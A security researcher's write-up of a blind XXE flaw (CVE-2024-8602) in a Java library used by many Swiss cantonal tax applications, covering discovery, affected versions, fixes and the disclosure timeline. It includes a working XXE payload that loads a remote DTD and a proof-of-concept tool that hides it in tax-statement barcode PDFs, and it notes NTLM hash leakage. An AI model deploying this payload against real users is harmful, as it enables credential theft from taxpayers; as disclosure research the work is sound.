This year I spent a little time looking at Swiss tax applications. Specifically, I looked at the 16 “official” desktop applications that allow you to do your taxes electronically. For non-Swiss readers: most of the 26 cantons (the Swiss equivalent of a state) have their own solution, which is why there are so many clients.
This first part is going to focus on the main finding of my tax adventures: a mass XXE in a Java library included in many Swiss tax applications.
The Recurring Jar #
All of the tax clients I looked at were programmed in Java. This meant I was able to decompile the classes and get (readable) source code back. Having source code enabled me to run a SAST tool like Semgrep↗.
I like Semgrep, as it shows me low-hanging fruit and gives me a general overview of what to expect. I actually like it so much that I built Bagel↗, a custom web UI for it. When I looked at Semgrep’s output after running it against a few clients, I noticed a pattern. A particular Java package kept coming up:
ch/ewv/taxstatement/TaxStatement.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
ch/ewv/taxstatement/examples/TaxStatementPDFToXML.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
ch/ewv/taxstatement/pdf/TaxStatementPDF.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
ch/ewv/taxstatement/report/TaxStatementReportSummary.java
❯❯❱ java.lang.security.audit.xxe.documentbuilderfactory-disallow-doctype-decl-missing.documentbuilderfactory-disallow-doctype-decl-missing
As an example, here is the reported code snippet of TaxStatementPDFToXML.java:
public static void displayXML(byte[] bArr) throws IOException, ParserConfigurationException, SAXException, XPathExpressionException {
    DocumentBuilderFactory newInstance = DocumentBuilderFactory.newInstance();
    newInstance.setNamespaceAware(false);
    Document parse = newInstance.newDocumentBuilder().parse(new ByteArrayInputStream(bArr));
    System.out.println("version: " + TaxStatement.getVersion(bArr));
    ...
}
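Semgrep flags this pattern because a DocumentBuilderFactory straight out of newInstance() accepts DOCTYPE declarations and expands the entities declared in them. Here is a minimal sketch of that default behavior, using a harmless internal entity instead of an external one. The class name DefaultParserDemo and the sample XML are made up for illustration and are not part of taxstatement.jar.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

// Hypothetical demo class, not part of taxstatement.jar.
final class DefaultParserDemo {

    // Sample document whose inline DTD declares a harmless internal entity.
    static final String XML_WITH_DOCTYPE =
        "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE demo [ <!ENTITY greeting \"expanded by the parser\"> ]>\n"
        + "<demo>&greeting;</demo>";

    // Parses like the flagged snippet does: default factory, no hardening.
    // Returns the text content of the root element.
    static String parseWithDefaults(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setNamespaceAware(false);
            Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement().getTextContent();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalStateException("Parsing failed", e);
        }
    }

    public static void main(String[] args) {
        // The DTD is processed and &greeting; is replaced by its value.
        System.out.println(parseWithDefaults(XML_WITH_DOCTYPE));
    }
}
```

If the parser honors an entity that the document itself declares, it will just as happily honor one that points to a file or a URL, which is the whole problem.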
This ch/ewv/taxstatement package was apparently very vulnerable to XXE↗ and was included in many of the tax applications I was looking at. A quick ripgrep↗ later, and the culprit, taxstatement.jar, was found.
rg "TaxStatementXML" --binary -g "*.jar" -l | ForEach-Object { Write-Host -NoNewline $(certutil -hashfile $_ md5)[1] && ":$_" }
1618f7a0389950c994b4f63305d77c73:sh\taxstatement-2.2.jar
1618f7a0389950c994b4f63305d77c73:tg\taxstatement-2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:zh\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:sg\lib\taxstatement-2.2.2.jar
1618f7a0389950c994b4f63305d77c73:gr\taxstatement-2.2.jar
2c7b537f0bda55a8f10ab2ec02c3500c:ge\taxstatement.jar
a4f04f2c39cf31a7c55a22960f618f78:bs\webapp\app\WEB-INF\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:zg\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:lu\webapp\app\WEB-INF\lib\taxstatement-2.2.2.jar
a4f04f2c39cf31a7c55a22960f618f78:ti\lib\taxstatement-2.2.2.jar
1618f7a0389950c994b4f63305d77c73:vs\taxstatement-2.2.jar
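For readers without ripgrep and certutil at hand, the same inventory can be sketched in Java: walk a directory, pick every jar whose file name contains taxstatement, and group the paths by MD5 so that identical copies line up. Note that matching on the file name instead of searching the jar contents is a simplification of the command above. JarInventory and its method names are made up for this sketch.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;
import java.util.stream.Collectors;
import java.util.stream.Stream;

// Hypothetical helper, not part of any tax application.
final class JarInventory {

    // Returns the lowercase hex MD5 digest of a file's bytes.
    static String md5Hex(Path file) {
        try {
            byte[] digest = MessageDigest.getInstance("MD5").digest(Files.readAllBytes(file));
            StringBuilder hex = new StringBuilder();
            for (byte b : digest) {
                hex.append(String.format("%02x", b));
            }
            return hex.toString();
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("MD5 should be available on every JVM", e);
        }
    }

    // Groups all jars below root whose name contains "taxstatement" by MD5 digest.
    static Map<String, List<Path>> groupByHash(Path root) {
        try (Stream<Path> paths = Files.walk(root)) {
            return paths
                .filter(Files::isRegularFile)
                .filter(p -> {
                    String name = p.getFileName().toString().toLowerCase();
                    return name.contains("taxstatement") && name.endsWith(".jar");
                })
                .sorted()
                .collect(Collectors.groupingBy(JarInventory::md5Hex, TreeMap::new, Collectors.toList()));
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        Path root = Path.of(args.length > 0 ? args[0] : ".");
        // Print one "hash:path" line per jar, like the listing above.
        groupByHash(root).forEach((hash, jars) ->
            jars.forEach(jar -> System.out.println(hash + ":" + jar)));
    }
}
```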
But what is this ominous taxstatement.jar doing inside so many of the 16 tax applications? Especially since, as we know, so many cantons do their own thing!
A Government RFC #
Using the dork taxstatement.jar site:*.ch, I found a 51-page PDF called Beilage zu eCH-196 E-Steuerauszug V2.2.0 – Technische Wegleitung↗ or in English “Appendix for eCH-196 E-Tax Statement V2.2.0 - Technical Guide”.
This document is part of the Swiss government RFC eCH-0196↗, which outlines the technical specifications for electronic tax statement files. But what the hell are “e-tax statement files” and why would you need one?
Whilst filling out your taxes, you have to submit all your bank accounts, their taxable value, and gross revenue to your local government. If you only have a few accounts, submitting this information will not take that much time. But imagine being a company or a private trader with numerous accounts. Using such an e-tax statement file, it’s a matter of drag and drop, and all your accounts are added to the electronic tax application. No more manual typing of account numbers, revenue, and co.
Such an e-tax statement file is, at its core, XML data (you can see where this is going), containing the following information:
- Bank name and the bank’s unique identifier (lei)
- Personal data to identify the account holder (you, the taxpayer)
- Each account with detailed data like taxable value and gross revenue
It looks like this:
<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<taxStatement xmlns="http://www.ech.ch/xmlns/eCH-0196/2" xmlns:eCH-0097="http://www.ech.ch/xmlns/eCH-0097/4" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xsi:schemaLocation="http://www.ech.ch/xmlns/eCH-0196/2 http://www.ech.ch/xmlns/eCH-0196/2/eCH-0196-2-0.xsd" id="CH0000000000000000000000000000" minorVersion="21" creationDate="2024-01-01T16:20:42" taxPeriod="2023" periodFrom="2023-01-01" periodTo="2023-12-31" country="CH" canton="LU" totalTaxValue="1337.0" totalGrossRevenueA="0" totalGrossRevenueB="0" totalWithHoldingTaxClaim="0">
<institution lei="424242AB1CD2EFGH3IJ4" name="Hacker Bank">
<lol></lol>
<uid>
<eCH-0097:uidOrganisationIdCategorie>CHE</eCH-0097:uidOrganisationIdCategorie>
<eCH-0097:uidOrganisationId>123456789</eCH-0097:uidOrganisationId>
</uid>
</institution>
<client clientNumber="133.713" salutation="2" firstName="Super" lastName="Hacker"/>
<listOfBankAccounts totalTaxValue="1337.0" totalGrossRevenueA="0" totalGrossRevenueB="0" totalWithHoldingTaxClaim="0">
<bankAccount iban="CH2100000000000000000" bankAccountNumber="133.713-370" bankAccountName="Super Secure Vault" bankAccountCountry="CH" bankAccountCurrency="CHF" totalTaxValue="1337.0" totalGrossRevenueA="0" totalGrossRevenueB="0" totalWithHoldingTaxClaim="0">
<taxValue referenceDate="2023-12-31" balanceCurrency="CHF" balance="1337.00" exchangeRate="1" value="1337.00"/>
<payment paymentDate="2023-12-31" name="Habenzins ohne Verrechnungssteuer" amountCurrency="CHF" amount="0" exchangeRate="1" grossRevenueA="0" grossRevenueB="0" withHoldingTaxClaim="0"/>
</bankAccount>
</listOfBankAccounts>
</taxStatement>
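To make the structure concrete, here is a minimal sketch of how a consumer could pull the account data out of such a file with the JDK's DOM API. This is not how taxstatement.jar does it. StatementReader and the trimmed-down sample document are made up for illustration, and the parser is told to refuse DOCTYPE declarations for reasons the rest of this post makes obvious.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NodeList;
import org.xml.sax.SAXException;

// Hypothetical reader, not part of taxstatement.jar.
final class StatementReader {

    // Namespace taken from the sample statement above.
    static final String ECH_0196_NS = "http://www.ech.ch/xmlns/eCH-0196/2";

    // Trimmed-down version of the sample statement (only a few attributes kept).
    static final String SAMPLE =
        "<taxStatement xmlns=\"http://www.ech.ch/xmlns/eCH-0196/2\" canton=\"LU\" totalTaxValue=\"1337.0\">"
        + "<listOfBankAccounts totalTaxValue=\"1337.0\">"
        + "<bankAccount iban=\"CH2100000000000000000\" bankAccountName=\"Super Secure Vault\" totalTaxValue=\"1337.0\"/>"
        + "</listOfBankAccounts>"
        + "</taxStatement>";

    // Maps each bank account's IBAN to its totalTaxValue attribute.
    static Map<String, String> taxValueByIban(String xml) {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            factory.setNamespaceAware(true);
            // Refuse any document that carries a DOCTYPE declaration.
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));

            NodeList accounts = doc.getElementsByTagNameNS(ECH_0196_NS, "bankAccount");
            Map<String, String> result = new LinkedHashMap<>();
            for (int i = 0; i < accounts.getLength(); i++) {
                Element account = (Element) accounts.item(i);
                result.put(account.getAttribute("iban"), account.getAttribute("totalTaxValue"));
            }
            return result;
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalArgumentException("Not a parsable tax statement", e);
        }
    }

    public static void main(String[] args) {
        taxValueByIban(SAMPLE).forEach((iban, value) -> System.out.println(iban + " -> " + value));
    }
}
```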
But handing out XML data to (non-technical) customers isn’t very user-friendly. That’s why the RFC specifies a barcode standard, into which the XML data is serialized. A PDF containing such barcodes is the final e-tax statement file a financial institution like your bank hands out to you.
This PDF↗, provided by SSK (hold on to that name), shows a preview of such codes (the ones on the right).
Top Secret Jar File #
Imagine being a (Java) developer who has to implement this RFC as a feature into, for example, a banking application you’re working on. You read through the RFC and find the following text in the technical guide on how to generate codes↗:
The sources, Javadoc, and examples are also available via the following URL in the file taxstatement-api-2.2.zip. https://esteuer.ewv-ete.ch/de/api/
You click on this link expecting a Java library, but your browser only gives you an HTTP 404 error:
You cannot actually download this jar file. At least not directly. The reason for this is not outlined in the PDFs, but using the magic of search engines again, I found this post↗ on a Swiss trading forum.
I asked the people that are responsible for the standard [2], but they told me they only give out that information to cantons and banks… could have otherwise been a cool project.
Let me introduce you to the SSK↗ (Schweizerische Steuerkonferenz), or in English, the “Swiss Tax Conference”. This interest group is responsible for managing the RFC, and its members are a few non-technical people and mostly developers/managers of the companies that build the existing tax applications.
It turns out, the SSK only gives you the jar file if you are a canton or a bank. I’m hoping that the SSK knows that Java applications include their libraries once you distribute them… in any case, have fun↗.
$$$ to XXE #
Well, you read the title and saw Semgrep’s output. The whole RFC eCH-0196 v2.2.0 (implemented in the official taxstatement.jar) is vulnerable to XXE↗.
Fun fact: Neither the RFC, the technical guide, nor the guide on generating codes mentions the word “security” (in an app security context) or the word “doctype” once.
Creating a PoC for the XXE vulnerability started by calling my bank. Since I did not find any example XML data on the World Wide Web, I had to ask my bank to generate some for me. There was only one problem: the PDF generation feature was not available at the moment.
I explained the situation (I’m a developer and need some “test data”) to the nice lady at the other end of the phone, and she actually gave a fuck. After putting me on hold, she came back to me with the good news from her boss saying that she would send me some sample data. I did not expect that to be honest. Kudos! Following the slight social engineering, crafting the XXE was actually pretty easy. I just added an external entity to the top of the e-tax statement XML data.
<?xml version="1.0" encoding="ISO-8859-1" standalone='no'?>
<!DOCTYPE demo [
<!ELEMENT demo ANY >
<!ENTITY % extentity SYSTEM "http://192.168.56.6:9999/stage1/haecks2.dtd">
%extentity;
%intern;
]
>
<taxStatement xmlns="http://www.ech.ch/xmlns/eCH-0196/2"...
Now came the harder part. Since the tax applications only accept this data in barcode form, I needed to generate a PDF from the XML above. It took me some time, but here is the main part of the final code that I used to generate a PDF containing the XXE:
// java -jar .\taxsploit.jar demo_data.xml
public static void main(String[] args) throws Exception {
    File file = new File(args[0]);
    if (!file.exists() || file.isDirectory()) {
        throw new FileNotFoundException("File " + args[0] + " not found!");
    }
    try {
        // Read the XML file
        byte[] xml = Files.readAllBytes(file.toPath());
        // Generate the barcodes from the XML
        BufferedImage[] images = TaxStatement.barCodeXML(xml);
        // Create a new PDF and a blank page
        PDDocument document = new PDDocument();
        PDPage blankPage = new PDPage();
        // Since the "official PDFs" are all rotated, we do the same
        blankPage.setRotation(90);
        // Add the barcode to the page
        TaxStatement.addBarCode(document, blankPage, images, 1);
        // Save the PDF
        document.save("output.pdf");
        document.close();
        // To verify that the generation has worked, also save the barcodes on their own
        // Those can be looked at using a barcode decoder
        for (int i = 0; i < images.length; i++) {
            File outpic = new File(String.format("output_%d.png", i));
            ImageIO.write(images[i], "png", outpic);
        }
    } catch (Exception e) {
        e.printStackTrace();
    }
}
To compile this code, you need taxstatement.jar and some other dependencies outlined in the technical documentation for generating codes↗. When running this, you get a nice PDF containing the XML data serialized into barcodes:
Afterward, I booted my tax VM and started throwing the PoC at all tax applications I knew shipped with taxstatement.jar. To my surprise, this worked on the first try. Here is the XXE in action for the cantons of Lucerne and Zurich:
Vulnerable Applications #
Here are all the vulnerable applications I found:
Canton | Vendor | App | Version | Vulnerable |
---|---|---|---|---|
BS | Information Factory | BalTax.2023 | 1.4.0 | yes |
GE | DV Bern | GeTax 2023 | 2023-1.0.3 | yes |
GR | Abraxas | SofTax GR 2023 NP | 1.0.7.52 | probably* |
LU | Information Factory | steuern.lu.2023 nP | 1.1.0 | yes |
SG | Information Factory | Steuer St. Gallen 2023 nP | 1.4.0 | yes |
SH | Abraxas | Steuern23 | 1.0.6.62 | yes |
TG | Abraxas | eFisc2024 | 1.0.0.43 | yes |
TI | Information Factory | eTax.ticino PF 2023 | 1.3.0 | yes |
VS | Abraxas | VSTax 2023 | 1.0.6.89 | probably* |
ZG | Information Factory | eTax.zug 2023 nP | 1.4.0 | yes |
ZH | Information Factory | Private Tax 2023 | 1.5.0 | yes |
*Sometimes, you need a personal access code/ID to be able to fill out tax forms. For SofTax GR and VSTax, I was not able to crack the algorithm to keygen me an ID, but since it is the same Abraxas codebase, they should be vulnerable.
Double Render All the Way #
Some applications will trigger the XXE twice, as they use taxstatement.jar to get the raw XML from the PDF and then feed it into their own, equally vulnerable DocumentParser. Thus, even after SSK patches the library, they would still be vulnerable. This is because disallow-doctype-decl does not sanitize or strip the exploit parts out of the XML; it only stops the parser that sets it from processing them.
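Since the payload survives in the extracted XML, every parser that touches it has to refuse DOCTYPE declarations, not only the one inside the library. Below is a minimal sketch of such a guard using the JDK's built-in parser. HardenedXml and its method names are hypothetical, and this is not the fix SSK shipped.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;

// Hypothetical helper: one hardened factory shared by every parse site.
final class HardenedXml {

    static DocumentBuilderFactory newHardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        // Any DOCTYPE declaration becomes a fatal parse error.
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defense in depth: no XInclude processing, no entity reference expansion.
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Returns true if the hardened parser accepts the document,
    // false if it rejects it (for example because of a DOCTYPE).
    static boolean isAccepted(String xml) {
        try {
            newHardenedFactory().newDocumentBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException e) {
            return false;
        } catch (ParserConfigurationException | IOException e) {
            throw new IllegalStateException("Parser setup or input handling failed", e);
        }
    }

    public static void main(String[] args) {
        String withDoctype = "<?xml version=\"1.0\"?><!DOCTYPE demo [ <!ENTITY x \"y\"> ]><demo>&x;</demo>";
        System.out.println("with DOCTYPE accepted:    " + isAccepted(withDoctype));
        System.out.println("without DOCTYPE accepted: " + isAccepted("<taxStatement/>"));
    }
}
```

The point of funnelling every parse through one factory method is that a second or third parser in the same application cannot quietly fall back to the defaults.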
Impact #
From my point of view, there isn’t that much impact. You’re fairly limited on what you can do with this blind XXE, especially as the main targets are standalone, single-user Windows computers.
- You can leak NTLM(v2) hashes, which could be crackable
- You can make simple HTTP GET requests
- You can crash the tax application
Leaking NTLM hashes by opening DTDs on a remote SMB share is probably the best loot you can hope for, especially as I was not able to leak a file, and in my humble opinion, making simple HTTP GET requests does not have that much impact in 2024.
That said, the main problem I still see is that taxstatement.jar is a library that is used god knows where. On a server, inside a web application, this might have more impact.
The Aftermath #
As SSK↗ was responsible for the RFC, I started the CVD (coordinated vulnerability disclosure) process by contacting them. What followed was a back-and-forth e-mail chain of which you can see the timeline below.
My contact person (non-technical) was very stubborn in ignoring my request for direct contact between me and the responsible technical person. They also never accepted my offer for a phone call, which would have made explaining some things easier. In the middle of the conversation, they even changed their standpoint from “yes, we will fix it” to “we need to verify the vulnerability first”.
After two months and a few emails, I was fed up and contacted the Swiss GovCERT BACS↗ because I wanted things to move forward, which they did. I do not have insights into the communication between the vendor and the BACS but hey, they reserved CVE-2024-8602, and after another month of waiting, the CVE became public.
Timeline
- 21.06.2024: Found vulnerability, initial contact via email from website, asked for a technical/security contact
- 24.06.2024: Got a response asking for details
- 24.06.2024: Sent details with a grace period of 90d (after the fix is available)
- 30.06.2024: Asked for an update
- 08.07.2024: Asked for an update with the deadline for BACS contact set to 14.07.2024
- 09.07.2024: Got a response saying they’ll fix it in version 2.2.4, no release date, no CVE, almost no questions answered
- 12.07.2024: Sent a response with 5 more open points/questions
- 17.07.2024: Got a response saying they are still evaluating it and checking if it is even a vulnerability
- 18.07.2024: Sent a response with more open points/questions and asked for the 3rd time for a phone call
- 18.07.2024: Got an out-of-office email (until 19.07)
- 18.08.2024: Contacted BACS with details about the case as it was not going forward with the vendor
- 21.08.2024: Got a response from BACS telling me they are looking into it and contacting the vendor
- 05.09.2024: Got a response from BACS telling me they are “negotiating” with a 3rd party who was put in charge by the vendor
- 09.09.2024: Got a response from BACS telling me they reserved CVE-2024-8602
- 09.09.2024: Replied with a response to their questions and asked a question about the publication date
- 09.09.2024: Got a response from BACS telling me they are still “negotiating” with a 3rd party
- 20.09.2024: Got a response from BACS telling me they are still “negotiating” with a 3rd party
- 20.09.2024: Replied with a question about their “negotiation” and the 3rd party
- 23.09.2024: Got a response from BACS telling me that the 3rd party is a security company put in charge by the vendor and they are also not super responsive
- 04.10.2024: Got a response from BACS telling me that they still have not heard back from the 3rd party
- 09.10.2024: SSK puts out a newsletter↗ informing their users about the vulnerability and that it’s fixed in version 2.2.4.1 (CVE and double render vulnerability not mentioned)
- 14.10.2024: Got a response from BACS telling me that CVE-2024-8602↗ is now public
The End #
At the end of the day, from my point of view, the vulnerability was just a blind, client-side XXE without much impact. Considering myself a good häcker, I did my due diligence in the form of a CVD and treated this the same way I would treat a more severe vulnerability.
Why this took so long to fix, why a 3rd party security company was involved, and why the vulnerability announcement contained almost no information is beyond me. Let’s remind ourselves: this is, at most, a three- to four-line fix per DocumentParser↗.
My goal of a BSides Bern 2024↗ talk quickly vanished, but I did not want to tease↗ something that I’ll never publish, so here we are. Thanks to the Swiss GovCERT BACS for dealing with the vendor, thanks to @_cydave↗ for proofreading parts of this, and thank you for reading this post.
See you soon with more Swiss tax shenanigans,
Cheers